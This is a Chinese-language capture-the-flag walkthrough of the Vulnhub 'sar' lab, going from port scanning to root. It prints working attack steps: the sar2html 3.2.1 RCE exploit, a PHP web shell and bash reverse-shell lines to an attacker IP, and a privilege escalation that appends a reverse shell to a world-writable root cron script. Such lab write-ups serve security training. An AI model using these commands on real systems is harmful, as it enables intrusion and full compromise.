靶场奇妙记之Vulnhub sar 靶场练习

admin 2025年5月8日09:12:04评论6 views字数 1597阅读5分19秒阅读模式
在网络安全领域,渗透测试是发现和修复漏洞的关键手段。本文通过一次模拟实战,详细解析如何从主机发现、漏洞利用到最终提权,揭示常见安全风险及防御思路。文中技术内容仅用于教育目的,请勿用于非法活动。

SAR

主机发现与端口扫描

主机发现

使用 nmap 对目标网段 172.16.20.0/24 进行存活主机扫描,发现目标主机 172.16.20.117

nmap -sP 172.16.20.0/24
靶场奇妙记之Vulnhub sar 靶场练习

扫描端口

进一步扫描目标主机的开放端口和服务版本:

nmap -sV -p- 172.16.20.117

显示 80/tcp 端口运行 Apache 2.4.29

靶场奇妙记之Vulnhub sar 靶场练习

Web渗透与目录枚举

访问目标IP的HTTP服务,发现默认页面。

靶场奇妙记之Vulnhub sar 靶场练习

枚举目录

通过目录扫描工具 dirb 枚举潜在路径:

dirb http://172.16.20.117/

index.html、phpinfo.php、robots.txt、server-status

靶场奇妙记之Vulnhub sar 靶场练习
http://172.16.20.117/robots.txt
靶场奇妙记之Vulnhub sar 靶场练习
http://172.16.20.117/sar2HTML/

关键发现:

robots.txt:提示禁止爬取的目录。

sar2HTML/: 存在 sar2html 3.2.1 应用,该版本存在已知漏洞。

靶场奇妙记之Vulnhub sar 靶场练习

历史漏洞利用

通过 searchsploit 查找 sar2html 的公开漏洞:

searchsploit sar2

发现漏洞 sar2html 3.2.1 - 'plot' 远程代码执行(RCE)(漏洞编号:49344)。下载利用脚本:

searchsploit sar2 -m 49344.py
靶场奇妙记之Vulnhub sar 靶场练习

反弹shell远程命令执行

执行脚本并注入反弹Shell代码:

python 49344.py
http://172.16.20.117/sar2HTML/index.php
ls
靶场奇妙记之Vulnhub sar 靶场练习

反弹shell

<?php system("bash -c 'bash -i &>/dev/tcp/172.16.20.106/8888 0>&1'");?>

在攻击机上监听端口 8888

nc -lvnp 8888
python -m http.server 8000
wget http://172.16.20.106:8000/shell.php
ls
靶场奇妙记之Vulnhub sar 靶场练习

访问shell

成功获取反向Shell。

http://172.16.20.117/sar2HTML/shell.php
靶场奇妙记之Vulnhub sar 靶场练习

权限提升(提权)

分析Web目录权限

进入 /var/www/html 发现 finally.sh 和 write.sh 由 root 定期执行,但 write.sh 对普通用户可写。

cd /var/www/html
ls -l

  -rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
  -rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
  -rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
  -rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
  drwxr-xr-x 4 www-data www-data 4096 May 7 12:12 sar2HTML
  -rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
靶场奇妙记之Vulnhub sar 靶场练习
查看文件
cat finally.sh
#!/bin/sh
  ./write.sh

cat write.sh
#!/bin/sh
  touch /tmp/gateway
靶场奇妙记之Vulnhub sar 靶场练习

篡改定时任务

向 write.sh 追加反弹Shell命令,监听新端口 7777

echo"/bin/bash -c 'bash -i >& /dev/tcp/172.16.20.106/7777 0>&1'" >> write.sh
靶场奇妙记之Vulnhub sar 靶场练习
监听端口
nc -lnvp 7777
靶场奇妙记之Vulnhub sar 靶场练习

提权成功

原文始发于微信公众号(泷羽Sec-Ceo):靶场奇妙记之Vulnhub sar 靶场练习

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月8日09:12:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场奇妙记之Vulnhub sar 靶场练习https://cn-sec.com/archives/4040100.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息